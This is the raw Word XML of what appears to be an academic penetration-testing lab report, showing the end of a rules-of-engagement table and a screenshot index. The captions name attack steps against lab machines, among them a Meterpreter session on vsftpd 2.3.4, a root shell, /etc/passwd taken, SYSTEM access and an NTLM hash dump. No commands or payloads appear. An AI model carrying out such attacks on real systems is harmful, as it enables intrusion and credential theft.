      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="57DBFF1B"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6A555A7" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Prohibited</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D3B538" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>DoS, destructive payloads, exfiltration beyond lab boundary, social engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="71469F50"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DD69FE0" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Kill Switch</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DC031E3" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Immediate VM power-off; restore from pre-attack snapshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="0C01236D"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D5AB5B3" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Evidence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BF974C2" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Screenshots and logs retained in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>PenTest_Evidence</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="6EB8B8E3"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2B8C41F" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Legal Basis</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548A398" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Academic virtualised lab only. Compliant with Computer Misuse Act 1990 (UK) within authorised academic context.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F99BEEC" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="083E314A" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="AAAAAA"/>
        </w:pBdr>
        <w:spacing w:before="160"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F59748" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Appendix B: Figure and Screenshot Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB99638" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="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7"/>
        <w:gridCol w:w="2942"/>
        <w:gridCol w:w="3538"/>
        <w:gridCol w:w="1639"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="7A80D026" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="93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26C4E638" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Figure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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AC0C031" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Screenshot File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="390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F9A0D6F" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="185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4026245" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="7940793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ABE2EE7" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Figure 1</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D1A1961" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>01_network_scan.png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D4C6053" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Nmap host discovery — all 4 VMs active</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1831EF" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="692762B3"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977E3B7" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Figure 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767B321" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>04_metasploitable_scan.png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04FD60C" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>vsftpd 2.3.4 on port 21/tcp</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D37B20" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="74943365"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025255" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Figure 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F1D5089" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>05_EXPLOIT1_SUCCESS.png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A76073" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Meterpreter session opened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A2BFCF6" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exploit 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="1448ADE9"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4849536" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Figure 4</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D5D2BA2" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>06_EXPLOIT1_ROOT.png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5FB8CD" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>getuid — root confirmed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54146DE" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exploit 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="47D06100"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3446F67" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Figure 5</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3729F41" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>08_exploit1_passwd.png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F545C7A" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/etc/passwd exfiltrated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26C8251" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exploit 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="1C6F81B8"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0261558" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Figure 6</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00D8A5C" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WIN_09_nmap_scan.png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81F0DE" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Port 445/tcp open on Windows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E0261D1" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exploit 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="0439BE16"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CD02DCE" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Figure 7</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97A405B" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WIN_11_smb_success.png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03BB19" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SMB login — Administrator confirmed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42D9855" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exploit 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="2B11701F"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63E173A" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Figure 8</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0DDF9F" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WIN_12_meterpreter_system.png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A48782E" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>NT AUTHORITY\SYSTEM access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375701" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exploit 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="3E4A8CF1"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70715EC" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Figure 9</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5E0F592" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WIN_13_hashdump.png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39BF06" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>NTLM hash dump — all accounts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6232FA" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exploit 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="03B964A3"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0DD783" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Figure 10</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118DE4" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>BWAPP_15_dashboard.png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77D1A60" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
